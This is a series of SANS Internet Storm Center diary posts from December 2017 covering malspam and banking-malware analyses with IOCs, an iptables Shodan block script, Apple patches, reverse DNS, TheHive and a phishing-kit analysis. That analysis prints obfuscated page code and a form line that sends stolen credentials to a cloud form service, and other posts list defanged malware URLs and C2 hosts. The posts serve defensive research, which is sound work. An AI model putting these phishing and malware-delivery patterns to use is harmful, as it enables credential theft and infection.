  • Date/Time:  Sunday, 2017-12-10 16:28 UTC
  • From:  "Martine" <vhgred@adsupplyco.com>
  • Subject:  I would go through the streets slack-jawed
  • Date/Time:  Sunday, 2017-12-10 18:04 UTC
  • From:  "Birgit" <clhzyuade@edhec.com>
  • Subject:  Oh Gooood, it is the hottest of all that I've ever seen Just look here!
  • Date/Time:  Sunday, 2017-12-10 19:14 UTC
  • From:  "Manon" <dhxnik@advanceserviceplus.com>
  • Subject:  Is your character as hard as your muscles?
  • Date/Time:  Sunday, 2017-12-10 23:10 UTC
  • From:  "Lola" <fotubhw@1800radiator.com>
  • Subject:  Even your eyes can tell me how confident you are.

Links in the emails:

  • hxxp://khudermunkh[.]mn/cgi/
  • hxxp://martialartsbenefits[.]com/SeeMyXXXphoto.zip

Malware:

SHA256 hash:  922784709d4054db9df7149b3b0d17ba310b4c3b3ba5ca4d41f1f460d318dd83

  • File size:  2,201,826 bytes
  • File name:  SeeMyXXXphoto.zip
  • Description:  Downloaded zip archive

SHA256 hash:  28f18837d7a60d8a5d90b96c48a104996fcfb4a710b8abcfe1449607d101dd67

  • File size:  2,339,166 bytes
  • File name:  Open and see my XXX photo and Video.exe
  • Description:  Extracted Windows executable - Bitcoin mining malware

Traffic from an infected Windows host:

  • 144.217.101.20 port 8005 - xmr-usa.dwarfpool.com - CPUminer traffic

Final words

Windows 10 hosts seem well-protected against this threat.  As always, on older versions of Windows, system administrators and the technically inclined can implement best practices like Software Restriction Policies (SRP) or AppLocker to prevent these types of infections.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

3 Comments

Published: 2017-12-09

Sometimes it's a dud

A reader submitted a malicious RTF file, experiencing difficulty to find the malicious code.

It was delivered via email, we analyze the file with emldump.py:

I've seen such emails before:

They typically have a malicious document as attachment.

Here it's an RTF file:

We can analyze it with rtfdump.py:

The RTF file has no objects:

It's always possible that objects are so obfuscated, that rtfdump.py is not able to identify them. So let's take a look at the amount of hexadecimal characters we can find in the RTF file:

There's hardly any hexadecimal characters, the longest contiguous string of hexadecimal characters is just 20 characters long.

So this RTF file does not seem to contain malicious code. Looking at the file itself with a text editor, I came to the conclusion that it's just an empty RTF file (with metadata). With the metadata, I was able to find actual malicious RTF files produced by the same actor. So this must be a failed attempt at delivering malicious documents.

 

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2017-12-08

Using Our API To Adjust iptables Rules

We are offering a simple (IMHO) API to allow you to script various queries against our databases. One dataset we offer is a list of IP addresses that are scanning the internet for exposed services. The most prominent of these services is likely Shodan. To avoid having any devices from your organization show up in Shodan, you may want to block all scans from known Shodan hosts. We do create a list of these IP addresses and update it daily. The respective API query to retrieve the list is:

https://isc.sans.edu/api/threatlist/shodan/

By default, the list is returned as XML. But it is pretty easy to change the format. All you need to do is add ?json, ?text ... This will make processing with simple scripts rather easy. The "text" format is probably easiest to process with shell tools, but just in case the format is changing later in some subtle way, it is probably safest to use JSON and have the "jq" utility parse it:

curl -s https://isc.sans.edu/api/threatlist/shodan?json | jq '.[] | {ipv4}' | grep ':' | awk '{ print $2 }' | tr -d '"'

This will return a list of all the IP addresses. To use this in iptables, I would recommend setting up a new table. Something like:

iptables -F shodan
iptables -A shodan -j RETURN
for ip in `curl -A "myemailadress" -s https://isc.sans.edu/api/threatlist/shodan?json | jq '.[] | {ipv4}' | grep ':' | awk '{ print $2 }' | tr -d '"'`
do  
  echo $ip
  if [[ $ip =~ ^[0-9\.]+$ ]]
  then
    iptables -A shodan -s $ip -j LOGDROP
  else
    echo "Bad IP Address. Aborting."    
    exit
  fi
done
iptables -D shodan 1

"LOGDROP is a table that will log the packet and drop it. You could also just drop it here, but this would be a bit dangerous as you wouldn't see these dropped packets in your logs which makes debugging problems extra fun.

For a full list of our API functions, see https://isc.sans.edu/api . Please note to use your e-mail address as a user agent. We do not require authentication, but if your script causes issues, then it would be nice if we can check with you vs. just block you.

Of course, test carefully and use at your own risk.

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute
STI|Twitter|

 

6 Comments

Published: 2017-12-06

Apple Updates Everything. Again.

After a rushed release of iOS 11.2 over the weekend to fix a "December 2nd Crash" bug, and last weeks special update to fix the passwordless root authentication bypass in macOS, Apple today released its official set of security updates. With this, we also received details about the security issues patched in iOS this weekend. Apple's different operating systems share a lot of code with each other, and as a result, they also share some vulnerabilities. I am trying to organize the details in a table below (starting with macOS. Others will be added soon)

Apple's security updates can be found here: https://support.apple.com/en-us/HT201222

Overview

Component CVE MacOS, OS X iOS tvOS watchOS
Mail Drafts %%cve:2017-13860%% X X    
IOKit %%cve:2017-13847%% X X    
Kernel %%cve:2017-13862%% X X X X
Kernel %%cve:2017-13876%% X X X X
Kernel %%cve:2017-13867%% X X X X
Kernel %%cve:2017-13869%% X X X X
OpenSSL %%cve:2017-3735%% X      
Kernel %%cve:2017-13868%% X X X X
Mail %%cve:2017-13874%%   X    
Kernel %%cve:2017-13833%% X X X X
Wi-Fi %%cve:2017-13080%%   X X X
Kernel %%cve:2017-13865%% X X X X
IOKit %%cve:2017-13858%% X      
IOAcceleratorFamily %%cve:2017-13844%% X      
Intel Graphics Driver %%cve:2017-13883%% X      
Kernel %%cve:2017-13855%% X X X X
curl %%cve:2017-1000254%% X      
Intel Graphics Driver %%cve:2017-13878%% X      
Directory Utility %%cve:2017-13872%% X      
Intel Graphics Driver %%cve:2017-13875%% X      
IOKit %%cve:2017-13848%% X      
Mail %%cve:2017-13871%% X      
IOMobileFrameBuffer %%cve:2017-13879%%   X    
apache %%cve:2017-9798%% X      
IOSurface %%cve:2017-13861%%   X X X
Screen Sharing Server %%cve:2017-13826%% X      

MacOS / OS X

Component High Sierra Sierra El Capitan Impact Description CVE
Apache x x x Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory Multiple issues were addressed by updating to version 2.4.28. %%cve:2017-9798%%
cURL x x x Malicious FTP servers may be able to cause the client to read out-of-bounds memory An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking. %%cve:2017-1000254%%
Directory Utility x     An attacker may be able to bypass administrator authentication without supplying the administrator’s password

A logic error existed in the validation of credentials. This was addressed with improved credential validation.
(this is the "password-less root" patch released last week)

%%cve:2017-13872%%
Intel Graphics Driver x     An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13883%%
Intel Graphics Driver x     A local user may be able to cause unexpected system termination or read kernel memory An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. %%cve:2017-13878%%
Intel Graphics Driver x     An application may be able to execute arbitrary code with system privileges An out-of-bounds read was addressed through improved bounds checking. %%cve:2017-13875%%
IOAcceleratorFamily x x x An application may be able to execute arbitrary code with system privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13844%%
IOKit x     An application may be able to execute arbitrary code with system privileges An input validation issue existed in the kernel. This issue was addressed through improved input validation. %%cve:2017-13848%%,%%cve:2017-13858%%
IOKit x x x An application may be able to execute arbitrary code with system privileges Multiple memory corruption issues were addressed through improved state management. %%cve:2017-13847%%
Kernel x x x An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13862%%
Kernel x x x An application may be able to read restricted memory An out-of-bounds read was addressed with improved bounds checking. %%cve:2017-13833%%
Kernel x     An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13876%%
Kernel x x x An application may be able to read restricted memory A type confusion issue was addressed with improved memory handling. %%cve:2017-13855%%
Kernel x x x A malicious application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13867%%
Kernel x     An application may be able to read restricted memory A validation issue was addressed with improved input sanitization. %%cve:2017-13865%%
Kernel x x x An application may be able to read restricted memory A validation issue was addressed with improved input sanitization. %%cve:2017-13868%%,%%cve:2017-13869%%
Mail x     A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed An inconsistent user interface issue was addressed with improved state management. %%cve:2017-13871%%
Mail Drafts x     An attacker with a privileged network position may be able to intercept mail An encryption issue existed with S/MIME credetials. The issue was addressed with additional checks and user control. %%cve:2017-13860%%
OpenSSL x x x An application may be able to read restricted memory An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. This issue was addressed with improved bounds checking. %%cve:2017-3735%%

iOS

Component Affected Models Impact Description CVE
IOKit iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to execute arbitrary code with system privileges Multiple memory corruption issues were addressed through improved state management. %%cve:2017-13847%%
IOMobileFrameBuffer iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to execute arbitrary code with kernel privilege A memory corruption issue was addressed with improved memory handling. %%cve:2017-13879%%
IOSurface iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13861%%
Kernel iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13862%%,%%cve:2017-13876%%
Kernel iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to read restricted memory An out-of-bounds read was addressed with improved bounds checking. %%cve:2017-13833%%
Kernel iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to read restricted memory A type confusion issue was addressed with improved memory handling. %%cve:2017-13855%%
Kernel iPhone 5s and later, iPad Air and later, and iPod touch 6th generation A malicious application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13867%%
Kernel iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An application may be able to read restricted memory Multiple validation issues were addressed with improved input sanitization. %%cve:2017-13865%%,%%cve:2017-13868%%,%%cve:2017-13869%%
Mail iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Incorrect certificate is used for encryption A S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate. %%cve:2017-13874%%
Mail Drafts iPhone 5s and later, iPad Air and later, and iPod touch 6th generation An attacker with a privileged network position may be able to intercept mail An encryption issue existed with S/MIME credetials. The issue was addressed with additional checks and user control. %%cve:2017-13860%%
Wi-Fi iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation
Released for iPhone 7 and later and iPad Pro 9.7-inch (early 2016) and later in iOS 11.1.
An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK) A logic issue existed in the handling of state transitions. This was addressed with improved state management. %%cve:2017-13080%%

Apple TV

Component Affected Models Impact Description CVE
IOSurface Apple TV 4K and Apple TV (4th generation) An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13861%%
Kernel Apple TV 4K and Apple TV (4th generation) An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13862%%,%%cve:2017-13876%%
Kernel Apple TV 4K and Apple TV (4th generation) An application may be able to read restricted memory An out-of-bounds read was addressed with improved bounds checking. %%cve:2017-13833%%
Kernel Apple TV 4K and Apple TV (4th generation) An application may be able to read restricted memory A type confusion issue was addressed with improved memory handling. %%cve:2017-13855%%
Kernel Apple TV 4K and Apple TV (4th generation) A malicious application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13867%%
Kernel Apple TV 4K and Apple TV (4th generation) An application may be able to read restricted memory Multiple validation issues were addressed with improved input sanitization. %%cve:2017-13865%%,%%cve:2017-13868%%,%%cve:2017-13869%%
Wi-Fi Apple TV (4th generation) An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK) A logic issue existed in the handling of state transitions. This was addressed with improved state management. %%cve:2017-13080%%

Watch OS

Component Affected Models Impact Description CVE
IOSurface All  An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13861%%
Kernel All  An application may be able to execute arbitrary code with kernel privileges A memory corruption issue was addressed with improved memory handling. %%cve:2017-13862%%,%%cve:2017-13876%%
Kernel All  An application may be able to read restricted memory An out-of-bounds read was addressed with improved bounds checking. %%cve:2017-13833%%
Kernel All  An application may be able to read restricted memory A type confusion issue was addressed with improved memory handling. %%cve:2017-13855%%
Kernel All    A memory corruption issue was addressed with improved memory handling. %%cve:2017-13867%%
Kernel All  An application may be able to read restricted memory A validation issue was addressed with improved input sanitization. %%cve:2017-13865%%,%%cve:2017-13868%%,%%cve:2017-13869%%
Wi-Fi 1st Gen and
Series 3
An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK) A logic issue existed in the handling of state transitions. This was addressed with improved state management. %%cve:2017-13080%%

 

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|

 
 
 
 
 
 
 
 
 
 
 
 

0 Comments

Published: 2017-12-06

PSA: Do not Trust Reverse DNS (and why does an address resolve to "localhost").

Odd reverse DNS entries keep coming up from time to time. So I think we are due for a quick public service announcement about reverse DNS.

Reverse DNS can be a valuable to find out more about an IP address. For example:

$ dig +short -x 73.53.237.51
c-73-53-237-51.hsd1.fl.comcast.net.

This tells me that the IP belongs to Comcast and is probably located in Florida. 

$ dig +short -x 189.154.91.153
dsl-189-154-91-153-dyn.prod-infinitum.com.mx.

the "dyn" part usually indicates that this is a dynamic IP address. For example, mail servers will often mark e-mail received from them as spam. In particular spam filtering relies often on reverse DNS. In order to configure reverse DNS, you typically need to be assigned an IP address block from your ISP, and the ISP needs to make your DNS server authoritative for the block by adding respective NS (name server records). This can not be done for dynamic IPs and typically requires at least a /24 assignment (some ISPs allow updating reverse IP addresses via web applications to allow small business users with /29s or individual IPs to update reverse DNS records).

So what is the problem? Let's take a look at this IP that our reader John noted in his e-mail server logs:

$ dig +short -x 123.28.192.74
localhost.

That's right. This IP resolves to "localhost". This isn't exactly a new trick. Sometimes I think this is just done out of laziness. But the effect is that e-mail from this IP may slip past some spam filters, and it is a bit more difficult to find the actual owner of the IP. A quick sample suggests that all IPs in 123.28/16 resolve to localhost.

The problem with reverse DNS is that the owner of the IP address is in charge of reverse DNS, not the owner of the domain the IP resolves to. Anybody who has control over reverse DNS for an IP address block can make the address reverse resolve to "isc.sans.edu" (or localhost).

Some access control mechanisms use hostnames instead of IP addresses, and as a result, rely on reverse DNS for access control. This is BAD!

To trust reverse DNS, you need to at least make sure that forward and reverse DNS matches. This way, both the owner of the domain, as well as the owner of the IP address, have to enter matching configurations. For example, if you are adding form="*.example.com" to your ssh authorized_keys file, sshd will make sure forward and reverse resolution match. Same if you try to figure out if a particular IP address But even in this case, you are still using DNS, a not very robust protocol, for security decisions. This is fine as an additional constraint, for example in addition to an ssh key, or for spam filtering in which case you do not have to be perfect.

If you are using reverse DNS as part of your incident response process, then you also need to be aware that whoever operates the authoritative name server for that IP will likely learn of your requests. The attacker may be affiliated with the operator. This is mostly a concern for more sophisticated attackers, but overall it may be a good idea to at least use a more "anonymous" recursive name server like Google, OpenDNS or Quad9.

RFC1912 actually states that every IP should have a name (and with that, a PTR record). But note it says should, not must. I believe it is a good idea to configure reverse DNS. But keep in mind that it should not leak information. I like the system that most ISPs use, that essentially use something like [ipaddress].example.com. This way, a reverse lookup will still point to the right owner of the IP, but it will not leak any information beyond that. A "whois" lookup would give you the same information, but whois tends to be slower, more difficult to update, and more difficult to parse then DNS. Unless your system is a mail server, in which case you want to make sure that forward and reverse DNS matches to avoid spam filter problems.

And don't forget to make sure that you sanitize and properly encode reverse DNS results before using them. They should never be treated as "trusted".

 

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS Technology Institute
STI|Twitter|

 
 
 
 
 
 
 
 

0 Comments

Published: 2017-12-05

IR using the Hive Project.

Request Tracker Incident Response (RTIR) is one of the most popular IR ticketing systems. Its a open source project based on perl and MySQL. While it meets all your typical ticket tracking items, it needs lots of customization to meet your SOC needs. A few months ago I came across a project called TheHive (https://thehive-project.org/) that is a scalable open source platform.

 

The frontend is written in AngularJS and the backend is Elastic Search. The platform has the ability to create tickets, organize workflow, track indicators, import data about indicators from other sources and export it into MISP. The group of guys that are developing this are doing an amazing job of fixing bugs and adding new features to the system on a monthly basis.

 

 

The hive has several other components that should be leveraged to give you the power of the overall system. These components are Cortex and Hippocampe.

 

They have several ways to get started. They have a set Docker Images, a test VM, and you can download from source and install. I'd start with the VM or Docker just to get a feel for it.


 

Basic GUI workflow:

To create a new cause using a template select new case and the template you want.



 



 

The initial details page is filled with whatever you set up for the template, new tags and any additional information can be added.

Tasks is where you put your case notes. You can have it broken out by the 6 stages of IR, by tools, or playbook processes. Within the tasks you can have the IR processes documented to go along with the task itself.



 

Select the task you are working and then add a new task log to document your findings.

 

 

TheHive definitely meets the requirement for for logging,tracking, tracking. You can also add metrics that are required before the case is closed. What make this system great is the ability to add your IOC’s into the case, additionally if will tell you any other case that also has this IOC’s for better tracking.


 

Once you add in your IOC, you can ran analyzers in Cortex against the data and it will automatically be added to the case. They have 30 analyzers currently you can setup and use.
 

 

I have just scratched the surface of the tool, they do a great job of documentation and you should check out their blog https://blog.thehive-project.org for lots more information.

 

--

Tom Webb

@twsecblog

1 Comments

Published: 2017-12-03

StartSSL: Termination of Services is Now Scheduled

StartCom[1] has been a key player for years in the landscape of SSL certificate providers with its 'StartSSL' services. They provided free SSL certificates for everybody and permitted a lot of small organizations to increase the security of their web communications. The fact that StartCom is a China-based company was, for some organizations, a good reason to flag their activities as suspicious. They also suffered from security incidents[2]. In October 2016, Mozilla decided[3] to remove the StartCom certificates from Firefox. Google did the same with Chrome in March 2017[4].

The termination of services is now officially scheduled (for the 1st of January 2018). Here is the official message sent to customers:

Dear customer,

As you are surely aware, the browser makers distrusted StartCom around a
year ago and therefore all the end entity certificates newly issued by
StartCom are not trusted by default in browsers.

The browsers imposed some conditions in order for the certificates to be
re-accepted. While StartCom believes that these conditions have been met, it
appears there are still certain difficulties forthcoming. Considering this
situation, the owners of StartCom have decided to terminate the company as a
Certification Authority as mentioned in Startcom´s website.

StartCom will stop issuing new certificates starting from January 1st, 2018
and will provide only CRL and OCSP services for two more years.

StartCom would like to thank you for your support during this difficult
time.

StartCom is contacting some other CAs to provide you with the certificates
needed. In case you don´t want us to provide you an alternative, please,
contact us at certmaster@startcomca.com

Please let us know if you need any further assistance with the transition
process. We deeply apologize for any inconveniences that this may cause.

Best regards,

StartCom Certification Authority

I searched across my SSL activity logs and I found 5 websites still using a StartSSL certificate. If you're still using StartSSL certificates for some websites, it's time to move to an alternative provider. We highly recommend having a look at the Let's Encrypt project[5].

[1] https://www.startcomca.com/
[2] https://isc.sans.edu/forums/diary/StartSSL+a+web+authentication+authority+suspend+services+after+a+security+breach/11071
[3] https://blog.mozilla.org/security/2016/10/24/distrusting-new-wosign-and-startcom-certificates/
[4] https://security.googleblog.com/2016/10/distrusting-wosign-and-startcom.html
[5] https://letsencrypt.org/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

1 Comments

Published: 2017-12-02

Using Bad Material for the Good

There is a huge amount of information shared online by attackers. Once again, pastebin.com is a nice place to start hunting. As this material is available for free, why not use it for the good? Attackers (with or without bots) are constantly looking for entry points on websites. Those entry points are a good place to search, for example, for SQL injections. Example:

add_to_cart.php?item=

As attackers are also hunting for new targets, they have automated tools or bots that scan the Internet for potential new victims. To do this, they use search engines and search for specific strings called "dorks". This term is coming from "Google Hacking Database Project"[1]. This is an old project but attackers are still creating lists of interesting URIs and it's quite easy to find them. Here is an example of pastie with a big list of dorks:

https://pastebin.com/ABZ8Z8zy
https://pastebin.com/Tdvi8vgK

Why not reuse this free "bad" material to perform hunting in your own website's logs and have a head start on attackers? The benefits are multiple: you will probably detect suspicious pages that should not be publicly available and you'll be able to detect if people are already scanning your infrastructure.

With Splunk, create a CSV file containing all the interesting dorks and use a query like the following one to search for them across all your Apache logs:

sourcetype=access_combined [|inputlookup dorks.csv | eval uri="*".dork."*" | fields uri]

Don't forget that more dorks you search for in your logs, more hits you will find. Try to reduce the noise by removing trusted IP addresses, etc.

A good alternative to Apache logs is to use a tool like Bro that will extract URLs on the fly from the network traffic. With this technique, you'll also be able to detect rogue web applications!

Happy hunting!

[1] https://www.exploit-db.com/google-hacking-database/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments

Published: 2017-12-02

Phishing campaign uses old ".bat" script to spread banking malware - and it is flying under the radar

While hunting this week, I came across a phishing campaign spreading a banking malware using an old DOS Batch script to drop it. Surprisingly enough, the “.bat” file has a VT 0/58 rating helping cybercriminals targeting 9 different Brazilian Banks. In today’s diary, I’ll give some details about this underway campaign and its indicators of compromise (IOCs).

Let’s start with the malware analysis flow in Figure 1, from the e-mail phishing to the credentials theft.

Figure 1 – Malware analysis

Usually, most recent malware droppers are implemented in Visual Basic (VBS), JavaScript, or Microsoft Office document macros, to name a few. In this case, the dropper is a 2.6 kb ".bat" script that uses some rudimentary functions to identify the victim's processor architecture and then download the rest of the malicious files via powershell calls.

In an attempt to hide the ".bat" script code the contents of the file is encoded in UTF-16 with Chinese characters, as seen in Figure 2.

Figure 2 - ".bat" script with UTF-16 encoding

Figure 3 shows the part of the script that identifies the victim's processor architecture and downloads a ".zip" containing the other malware pieces.

Figure 3 – Batch script downloading the rest of the malware files

Next, a VBS is created to execute a powershell script contained in the System.ps1.bin file, as seen in Figure 4.

Figure 4 - VBS script creation for Powershell script execution

The objective of the powershell script is to inject the malicious "DLL" into a Windows process. In the malware samples I analyzed, the processes chosen for injection were "explorer.exe" and "svchost.exe".

Once in execution, the DLL performs the identification of the victim's geographic location using "ip-api.com/json/", as seen in Figure 5 and, subsequently, verifies anti-virus and banking software installed in the victim's system.

Figure 5 – Victim Geolocation

The collected information is encoded in base64 and sent to the attackers through an HTTP connection, as can be seen in Figure 6.

Figure 6 - C&C communication

From this moment on, malware will monitor victim’s access to 9 different Brazilian financial institutions and apply a screen overlay using fake forms. This way, the victim's typing is done on the malware form and the information is sent to the cybercriminals.

In addition, after  detailed analysis, it was possible to reverse the binary strings and discover the malware key logger and remote access capabilities, as seen in Figure 7.

Figure 7 – Reversing binary strings

Indicators of Compromise (IOCs)

Use the indicators listed below to prevent possible infections in your organization as well as to verify if your environment has already been compromised by this threat.

MD5

ba0239533dd7f85cb0d1df58fc129222
ed053046882301a893dda1171d62dd50
e94ea2673908d605f08c6a6d666dc97e
b34b92270968db55ab07633c11ad0883
7a7da8eaba3dc74622a9ae8b42b009cf

SHA256

e26e6b2d6da1b396d5be6f99731d0bed2afbb803f51f42f34ae8fe8fdd043878 c9416ba1a87da4bf89520d8d4493c4bf76ace4de5ea62299e7f00f6af9d89dd5 12802aa40908fb8821f26d0c09039586ed3bf511c143ca0e8f9ccced29d1cc6b 3a888d7e39083a10827ad25af083d60e8e65cf6177ce57d5ae73fb752df9e77d ba263af4baf72ae579a63ec51b5a7f576438c0c0abcd301137490703d63961a3

FILESYSTEM

%PROGRAMDATA%\dex%username%\
%PROGRAMDATA%\dex%username%\_.dll

NETWORK

hxxp://198.50.160.145
hxxp://panel-anonimato.cf/

--
Renato Marinho
Morphus Labs| LinkedInTwitter

0 Comments

Published: 2017-12-01

Phishing Kit (Ab)Using Cloud Services

When you build a phishing kit, they are several critical points to address. You must generate a nice-looking page which will match as close as possible to the original one and you must work stealthily to not be blocked or, at least, be blocked as late as possible.

Here is a simple phishing kit example. It starts with a simple pop-up to lure the victim:

Then a classic fake blurred invoice is displayed. The target is asked to provide his/her credentials to unlock the secret document. The page also contains some animated GIFs that make it more “dynamic” or attractive. Nothing fancy…

Let's check the original code. The obfuscation technique is simple: hex-encoding:

<script language=javascript>document.write(unescape('%0A%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%20%50%55%42%4C%49%43%20%22%2D%2F%2F%57%33%43%2F%2F%44%54
%44%20%58%48%54%4D%4C%20%31%2E%30%20%54%72%61%6E%73%69%74%69%6F%6E%61%6C%2F%2F%45%4E%22%20%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%54%52%2F
%78%68%74%6D%6C%31%2F%44%54%44%2F%78%68%74%6D%6C%31%2D%74%72%61%6E%73%69%74%69%6F%6E%61%6C%2E%64%74%64%22%3E%0A%3C%68%74%6D%6C%20%78%6D%6C%6E%73%3D%22%68%74
%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%31%39%39%39%2F%78%68%74%6D%6C%22%3E%3C%68%65%61%64%3E%0A%0A%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%69%63%6F%6E
%22%20%74%79%70%65%3D%22%69%6D%61%67%65%2F%6A%70%67%22%20%68%72%65%6 … Redacted … C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'))</script>

Easy to decode with a tool like JSDetox[1]. Let’s have a look at the decoded HTML. When analyzing this kind of phishing kit, the first thing I’m looking for is the HTML form details. Let’s grep for “POST”. Usually, form data are posted to a PHP script that writes a flat text file on the compromised server. Here is an example found a few weeks ago:

---------------------------------------------------------------------------
Netflix Info
---------------------------------------------------------------------------
Login Details
---------------------------------------------------------------------------
Username:
Password: 
---------------------------------------------------------------------------
Personal Details
---------------------------------------------------------------------------
Full Name: 
Date of Birth: 
Address: 
Mailbox:
City: 
Postcode: 
Phone Number: 
---------------------------------------------------------------------------
Card Details
---------------------------------------------------------------------------
Name on Card: 
Card Number: 
Expiry Date: 
CVV Code: 
Card BIN: 
Card Bank:
Card Type: 
IBAN: 
---------------------------------------------------------------------------
Sent from x.x.x.x on 10-12-2017 6:16:am via Mozilla/5.0 (iPhone; CPU iPhone OS 11_0_1 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A402 Safari/604.1

This is very simple but this method is facing many problems:

  • If the compromised server is cleaned, there is a risk for the attacker to lose all the stolen data. 
  • Such data are not easy to parse
  • The domain/IP address of the server can be quickly reported as malicious and injected in lists of IOCs.

To prevent this, attackers are trying to find alternative solutions to host their data in safe places. If we see icons, pictures and piece of code stored in cloud services, the sample above uses another well-known cloud service to host the data posted by the HTML form: It posts the data to a JotForm account:

<form method="POST" name="login_form" id="login_form" action="https://submit.jotformeu.com/submit/xxxxxxxxxx8564/"; target="_self”/>

JotForm[2] is a cloud service that helps to build online forms. Advantages for the attackers are multiple. Collected data can be analyzed, exported, each submits to a form can generate email notifications, everything is HTTPS based and… probably the most interesting: jotform.com is ranked #6532 in the Alexa top-1M[3] and jotformeu.com is ranked #139946. So, chances to be blocked are reduced because jotform is used by many valid websites and many organizations exclude the Top-X websites from their blocklists to avoid annoying users.

In the case described here, I contacted JotForm and, after some investigations, they suspended the abused account within a few hours. Thanks to them!

[1] https://github.com/svent/jsdetox
[2] https://www.jotform.com/
[3] http://s3.amazonaws.com/alexa-static/top-1m.csv.zip

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

0 Comments